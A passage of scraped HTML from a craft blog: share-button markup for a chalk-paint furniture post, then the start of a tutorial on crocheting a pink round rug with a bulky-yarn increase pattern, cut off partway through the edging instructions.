href="https://bufferapp.com/add?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&text=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&via=&picture=&count=horizontal&source=button" title onclick="essb.window(&#39;https://bufferapp.com/add?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&text=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&via=&picture=&count=horizontal&source=button&#39;,&#39;buffer&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_buffer"></span><span class=essb_network_name>Buffer</span></a></li><li class="essb_item essb_link_love nolightbox"> <a href=# title onclick="essb.loveThis(&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_love"></span><span class=essb_network_name>Love This</span></a></li><li class="essb_item essb_link_weibo nolightbox"> <a href="http://service.weibo.com/share/share.php?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&pic=" title onclick="essb.window(&#39;http://service.weibo.com/share/share.php?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&pic=&#39;,&#39;weibo&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_weibo"></span><span class=essb_network_name>Weibo</span></a></li><li class="essb_item essb_link_pocket nolightbox"> <a href="https://getpocket.com/save?title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F" title onclick="essb.window(&#39;https://getpocket.com/save?title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F&#39;,&#39;pocket&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pocket"></span><span class=essb_network_name>Pocket</span></a></li><li class="essb_item essb_link_xing nolightbox"> <a href="https://www.xing.com/social_plugins/share?h=1;url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;https://www.xing.com/social_plugins/share?h=1;url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;xing&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_xing"></span><span class=essb_network_name>Xing</span></a></li><li class="essb_item essb_link_ok nolightbox"> <a href="http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;ok&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_ok"></span><span class=essb_network_name>Odnoklassniki</span></a></li><li class="essb_item essb_link_mwp nolightbox"> <a href="http://managewp.org/share/form?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F" title onclick="essb.window(&#39;http://managewp.org/share/form?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F&#39;,&#39;mwp&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mwp"></span><span class=essb_network_name>ManageWP.org</span></a></li><li class="essb_item essb_link_whatsapp nolightbox"> <a href="whatsapp://send?text=Aaaand%20I%20Did%20It%20Again%20(...%20Painting%20Furniture%20With%20Chalk%20Paint)%20http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F" title onclick="essb.tracking_only('', 'whatsapp', '1804696349', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_whatsapp"></span><span class=essb_network_name>WhatsApp</span></a></li><li class="essb_item essb_link_meneame nolightbox"> <a href="http://www.meneame.net/submit.php?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;http://www.meneame.net/submit.php?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;meneame&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_meneame"></span><span class=essb_network_name>Meneame</span></a></li><li class="essb_item essb_link_blogger nolightbox"> <a href="https://www.blogger.com/blog_this.pyra?t&u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&n=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;https://www.blogger.com/blog_this.pyra?t&u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&n=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;blogger&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_blogger"></span><span class=essb_network_name>Blogger</span></a></li><li class="essb_item essb_link_amazon nolightbox"> <a href="http://www.amazon.com/gp/wishlist/static-add?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;http://www.amazon.com/gp/wishlist/static-add?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;amazon&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_amazon"></span><span class=essb_network_name>Amazon</span></a></li><li class="essb_item essb_link_yahoomail nolightbox"> <a href="http://compose.mail.yahoo.com/?body=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;http://compose.mail.yahoo.com/?body=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;yahoomail&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yahoomail"></span><span class=essb_network_name>Yahoo Mail</span></a></li><li class="essb_item essb_link_gmail nolightbox"> <a href="https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&body=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&ui=2&tf=1" title onclick="essb.window(&#39;https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&body=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&ui=2&tf=1&#39;,&#39;gmail&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_gmail"></span><span class=essb_network_name>Gmail</span></a></li><li class="essb_item essb_link_aol nolightbox"> <a href="http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&body=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&body=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;aol&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_aol"></span><span class=essb_network_name>AOL</span></a></li><li class="essb_item essb_link_newsvine nolightbox"> <a href="http://www.newsvine.com/_tools/seed&save?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&h=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;http://www.newsvine.com/_tools/seed&save?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&h=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;newsvine&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_newsvine"></span><span class=essb_network_name>Newsvine</span></a></li><li class="essb_item essb_link_hackernews nolightbox"> <a href="https://news.ycombinator.com/submitlink?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;https://news.ycombinator.com/submitlink?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&t=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;hackernews&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_hackernews"></span><span class=essb_network_name>HackerNews</span></a></li><li class="essb_item essb_link_evernote nolightbox"> <a href="http://www.evernote.com/clip.action?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;http://www.evernote.com/clip.action?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;evernote&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_evernote"></span><span class=essb_network_name>Evernote</span></a></li><li class="essb_item essb_link_myspace nolightbox"> <a href="https://myspace.com/post?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;https://myspace.com/post?u=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;myspace&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_myspace"></span><span class=essb_network_name>MySpace</span></a></li><li class="essb_item essb_link_mailru nolightbox"> <a href="http://connect.mail.ru/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&description=" title onclick="essb.window(&#39;http://connect.mail.ru/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&description=&#39;,&#39;mailru&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mailru"></span><span class=essb_network_name>Mail.ru</span></a></li><li class="essb_item essb_link_viadeo nolightbox"> <a href="https://www.viadeo.com/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&amp;title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;https://www.viadeo.com/?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&amp;title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;viadeo&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_viadeo"></span><span class=essb_network_name>Viadeo</span></a></li><li class="essb_item essb_link_line nolightbox"> <a href="https://social-plugins.line.me/lineit/share?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F" title onclick="essb.tracking_only('', 'line', '1804696349', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_line"></span><span class=essb_network_name>Line</span></a></li><li class="essb_item essb_link_flipboard nolightbox"> <a href="https://share.flipboard.com/bookmarklet/popout?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29" title onclick="essb.window(&#39;https://share.flipboard.com/bookmarklet/popout?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&#39;,&#39;flipboard&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_flipboard"></span><span class=essb_network_name>Flipboard</span></a></li><li class="essb_item essb_link_comments nolightbox"> <a href=#comments title onclick="essb.tracking_only('', 'comments', '1804696349', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_comments"></span><span class=essb_network_name>Comments</span></a></li><li class="essb_item essb_link_yummly nolightbox"> <a href="http://www.yummly.com/urb/verify?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&image=&yumtype=button" title onclick="essb.window(&#39;http://www.yummly.com/urb/verify?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&image=&yumtype=button&#39;,&#39;yummly&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yummly"></span><span class=essb_network_name>Yummly</span></a></li><li class="essb_item essb_link_sms nolightbox"> <a href="sms:&body=Aaaand%20I%20Did%20It%20Again%20(...%20Painting%20Furniture%20With%20Chalk%20Paint)%20http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F" title onclick="essb.window(&#39;sms:&body=Aaaand%20I%20Did%20It%20Again%20(...%20Painting%20Furniture%20With%20Chalk%20Paint)%20http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F&#39;,&#39;sms&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_sms"></span><span class=essb_network_name>SMS</span></a></li><li class="essb_item essb_link_viber nolightbox"> <a href="viber://forward?text=Aaaand%20I%20Did%20It%20Again%20(...%20Painting%20Furniture%20With%20Chalk%20Paint)%20http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F" title onclick="essb.tracking_only('', 'viber', '1804696349', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_viber"></span><span class=essb_network_name>Viber</span></a></li><li class="essb_item essb_link_telegram nolightbox"> <a href="tg://msg?text=Aaaand%20I%20Did%20It%20Again%20(...%20Painting%20Furniture%20With%20Chalk%20Paint)%20http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F" title onclick="essb.tracking_only('', 'telegram', '1804696349', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_telegram"></span><span class=essb_network_name>Telegram</span></a></li><li class="essb_item essb_link_subscribe nolightbox"> <a href=# title onclick="essb.toggle_subscribe('1804696349'); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_subscribe"></span><span class=essb_network_name>Subscribe</span></a></li><li class="essb_item essb_link_skype nolightbox"> <a href="https://web.skype.com/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;https://web.skype.com/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;skype&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_skype"></span><span class=essb_network_name>Skype</span></a></li><li class="essb_item essb_link_messenger nolightbox"> <a href="https://www.facebook.com/dialog/send?app_id=&link=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&redirect_uri=https://facebook.com" title onclick="essb.window(&#39;https://www.facebook.com/dialog/send?app_id=&link=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&redirect_uri=https://facebook.com&#39;,&#39;messenger&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_messenger"></span><span class=essb_network_name>Facebook Messenger</span></a></li><li class="essb_item essb_link_kakaotalk nolightbox"> <a href="https://story.kakao.com/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;https://story.kakao.com/share?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;kakaotalk&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_kakaotalk"></span><span class=essb_network_name>Kakao</span></a></li><li class="essb_item essb_link_livejournal nolightbox"> <a href="http://www.livejournal.com/update.bml?subject=Aaaand I Did It Again (... Painting Furniture With Chalk Paint)&event=%3Ca+href%3D%22http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F%22%3EAaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29%3C%2Fa%3E" title onclick="essb.window(&#39;http://www.livejournal.com/update.bml?subject=Aaaand I Did It Again (... Painting Furniture With Chalk Paint)&event=%3Ca+href%3D%22http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F%22%3EAaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29%3C%2Fa%3E&#39;,&#39;livejournal&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_livejournal"></span><span class=essb_network_name>LiveJournal</span></a></li><li class="essb_item essb_link_yammer nolightbox"> <a href="https://www.yammer.com/messages/new?login=true&amp;trk_event=yammer_share&amp;status=Aaaand%20I%20Did%20It%20Again%20(...%20Painting%20Furniture%20With%20Chalk%20Paint) http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F" title onclick="essb.window(&#39;https://www.yammer.com/messages/new?login=true&amp;trk_event=yammer_share&amp;status=Aaaand%20I%20Did%20It%20Again%20(...%20Painting%20Furniture%20With%20Chalk%20Paint) http%3A%2F%2Fzoomyummy.com%2F2017%2F09%2F10%2Faaaand-painting-furniture-chalk-paint%2F&#39;,&#39;yammer&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yammer"></span><span class=essb_network_name>Yammer</span></a></li><li class="essb_item essb_link_meetedgar nolightbox"> <a href="javascript:(function()%7B!function()%7Bvar e%3Ddocument.getElementsByTagName(&quot;head&quot;)%5B0%5D,t%3Ddocument.createElement(&quot;script&quot;)%3Bt.type%3D&quot;text/javascript&quot;,t.src%3D&quot;//app.meetedgar.com/share.js%3F&quot;%2BMath.floor(99999*Math.random()),e.appendChild(t)%7D()%7D)()%3B" title onclick="essb.tracking_only('', 'meetedgar', '1804696349', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_meetedgar"></span><span class=essb_network_name>Edgar</span></a></li><li class="essb_item essb_link_fintel nolightbox"> <a href="https://fintel.io/submit?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;https://fintel.io/submit?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;fintel&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_fintel"></span><span class=essb_network_name>Fintel</span></a></li><li class="essb_item essb_link_mix nolightbox"> <a href="https://mix.com/extension/add?source=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/" title onclick="essb.window(&#39;https://mix.com/extension/add?source=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&#39;,&#39;mix&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mix"></span><span class=essb_network_name>Mix</span></a></li><li class="essb_item essb_link_instapaper nolightbox"> <a href="https://www.instapaper.com/hello2?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&description=" title onclick="essb.window(&#39;https://www.instapaper.com/hello2?url=http://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/&title=Aaaand+I+Did+It+Again+%28...+Painting+Furniture+With+Chalk+Paint%29&description=&#39;,&#39;instapaper&#39;,&#39;1804696349&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_instapaper"></span><span class=essb_network_name>Instapaper</span></a></li></ul></div></div></div><div class="essb_morepopup_shadow essb_morepopup_shadow_391309640" onclick="essb.toggle_less_popup('391309640'); return false;"></div><div class="essb-subscribe-form essb-subscribe-form-1804696349 essb-subscribe-form-popup" data-popup=1 style="display: none;"><div class="essb-subscribe-form-content essb-subscribe-from-design1" data-position=sharebuttons-more data-design=design1><h4 class="essb-subscribe-form-content-title">Join our list</h4><p class=essb-subscribe-form-content-text>Subscribe to our mailing list and get interesting stuff and updates to your email inbox.</p><form action="https://zoomyummy.com?essb3_subscribe_nonce=771d655b92&essb-malchimp-signup=1" method=post class=essb-subscribe-from-content-form id=essb-subscribe-from-content-form-mailchimp><input class=essb-subscribe-form-content-email-field type=text value placeholder="Enter your email here" name=mailchimp_email><input class=submit name=submit type=submit value="Sign Up Now" onclick="essb.ajax_subscribe('1804696349', event);"></form><div class=essb-subscribe-loader> <svg version=1.1 id=loader-1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink x=0px y=0px width=40px height=40px viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space=preserve> <path fill=#000 d=M43.935,25.145c0-10.318-8.364-18.683-18.683-18.683c-10.318,0-18.683,8.365-18.683,18.683h4.068c0-8.071,6.543-14.615,14.615-14.615c8.072,0,14.615,6.543,14.615,14.615H43.935z> <animateTransform attributeType="xml" attributeName="transform" type="rotate" from="0 25 25" to="360 25 25" dur="0.6s" repeatCount="indefinite"/> </path> </svg></div><p class="essb-subscribe-form-content-success essb-subscribe-form-result-message">Thank you for subscribing.</p><p class="essb-subscribe-form-content-error essb-subscribe-form-result-message">Something went wrong.</p><div class=clear></div><p class=essb-subscribe-form-content-footer>We respect your privacy and take protecting it seriously</p></div><button type=button class=essb-subscribe-form-close onclick="essb.subscribe_popup_close('1804696349');">x</button></div><div class="essb-subscribe-form-overlay essb-subscribe-form-overlay-1804696349" onclick="essb.subscribe_popup_close('1804696349');"></div></div><footer class=entry-meta> <span class=cat-links><span class=screen-reader-text>Categories </span><a href=https://zoomyummy.com/category/furniture/ rel="category tag">furniture</a></span><span class=tags-links><span class=screen-reader-text>Tags </span><a href=https://zoomyummy.com/tag/chalk-paint/ rel="nofollow tag">chalk paint</a>, <a href=https://zoomyummy.com/tag/furniture/ rel="nofollow tag">furniture</a></span><span class=comments-link><a href=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/#comments rel=nofollow>1 Comment</a></span></footer></div></article><article id=post-54512 class="post-54512 post type-post status-publish format-standard hentry category-crochet category-rug tag-crochet tag-rug" itemtype=http://schema.org/CreativeWork itemscope=itemscope><div class=inside-article><header class=entry-header><h2 class="entry-title" itemprop="headline"><a href=https://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ rel=bookmark>How To Make A Simple Round Crochet Rug</a></h2><div class=entry-meta> <span class=posted-on><a href=https://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ title="2:51 pm" rel=bookmark><time class="entry-date published" datetime=2017-08-24T14:51:23+01:00 itemprop=datePublished>August 24, 2017</time><time class=updated datetime=2017-09-23T15:23:32+01:00 itemprop=dateModified>September 23, 2017</time></a></span> <span class=byline><span class="author vcard" itemtype=http://schema.org/Person itemscope=itemscope itemprop=author>by <a class="url fn n" href=https://zoomyummy.com/author/zoomyummy/ title="View all posts by zoomyummy" rel=author itemprop=url><span class=author-name itemprop=name>zoomyummy</span></a></span></span></div></header><div class=entry-content itemprop=text> <input class=jpibfi type=hidden><p><img src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-3-new.jpg alt="round crochet cushion tutorial" width=630 height=945 class="aligncenter size-full wp-image-54662" srcset="https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-3-new.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-3-new-267x400.jpg 267w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ data-jpibfi-post-title="How To Make A Simple Round Crochet Rug" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-3-new.jpg></p><blockquote><p>Hi friends!</p><p>In the past few months I&#8217;ve been really eager to pour more color into the place where I live. Just for fun. To make us feel better. And while doing that I learned one big thing about me &#8211; I can find a good excuse to use PINK in every project, for every room (I honestly did not know that about myself, but now I do&#8230;) 🙂</p><p>With <a href=https://zoomyummy.com/2017/08/02/painting-furniture-with-chalk-paint/ target=_blank>this</a> and <a href=https://zoomyummy.com/2017/07/22/dressing-airbed-k-project-happiness-overload/ target=_blank>this</a> happy project under my belt, I am super-excited to share with you another thing I made, my newest darling, the crochet round rug.</p><p>And it&#8217;s pink. Yes. What else is new, you might ask. 🙂</p><p>Anyways, I had been planning to make a big area rug for quite some time. The only thing that was holding me back was the fact that I did not really know how to prevent the rug from slipping (with a little baby in the house, that was my top priority).</p></blockquote><p>&nbsp;<br> &nbsp;</p><p><img class="aligncenter size-full wp-image-54524" src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-5-wm.jpg alt="how to make a round crochet rug" height=420 width=630 srcset="https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-5-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-5-wm-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ data-jpibfi-post-title="How To Make A Simple Round Crochet Rug" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-5-wm.jpg></p><blockquote><p>This issue was miraculously solved one day when I stumbled upon <a href=http://www.ikea.com/us/en/catalog/products/80227877/ target=_blank>this Ikea product</a>. The Stopp unti-slip underlay keeps the rug in place, which reduces the risk of slipping and makes it easier to vacuum. Awesome, huh?</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img class="aligncenter size-full wp-image-54521" src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-4-b-wm.jpg alt="how to make a round crochet rug" height=420 width=630 srcset="https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-4-b-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-4-b-wm-600x400.jpg 600w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/ data-jpibfi-post-title="How To Make A Simple Round Crochet Rug" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-4-b-wm.jpg></p><blockquote><p>If you&#8217;d like to make something similar, I am happy to describe for you what I did:</p><p>I used bulky yarn (<a href=http://www.zlatapriadka.sk/produkty/2177/YETTI-52070-ruzova-svetla target=_blank>this</a>, <a href=http://www.zlatapriadka.sk/produkty/23/YETTI-52034-ruzova target=_blank>this</a>, <a href=http://zlatapriadka.sk/produkty/93/LADA-LUXUS-54033-zlta target=_blank>this</a> and <a href=http://zlatapriadka.sk/produkty/88/LADA-LUXUS-53109-oranzova target=_blank>this</a>) and 6 mm crochet hook (J-10).</p><h3>PATTERN</h3><p>In<strong> Round 1</strong>, I made a magic ring and crocheted 13 double crochet stitches into it.</p><p><em>Note: If you&#8217;d like to make your rug with single crochet stitches (US), starting with 6-8 stitches is recommended in round 1.</p><p>If you&#8217;d like to make make your rug with half double crochet stitches (US), 10 stitches are recommended.</em></p><p><strong>Round 2:</strong> Make two stitches into each stitch of Round 1.<br> <strong>Round 3:</strong> Make two stitches into the first stitch of the previous round, one stitch into the next. Repeat this pattern.<br> <strong>Round 4:</strong> Make two stitches into the first stitch of the previous round, then one stitch into the next two stitches. Repeat all the way around.<br> <strong>Round 5:</strong> Make two stitches into the first stitch, then one stitch into the next three stitches. Repeat this pattern all the way around.</p><p>You now see a pattern emerging. In every round, the number of stitches between increases increases by one. <strong>To continue making your rug, increase the number of stitches between increases by one</strong>.</p><p>My rug has<strong> 53 rounds</strong>. And then the scalloped edging as Round 54.</p><p><em>Tip: If your rug starts to WAVE, that means you have too many stitches in the last round. To help that, make one round without any increases. </em></p><p>I<em>f your rug starts to look like a BOWL, that means that the number of stitches in the last round is too little. To help that, make one round with double the amount of increases.</em></p><p><strong>Edging:</strong></p><p>I ended my round 53 with 570 stitches (I think I officially ended with 571 stitches but since I needed to have a number of stitches which would be dividable by 6 to make the edging work, in round 53 I &#8216;got rid&#8217; of 1 stitch by making 1 dc decrease in two last stitches. It is not noticeable at all).</p><p>To make the edging I made this: &#8216;6 double crochet stitches 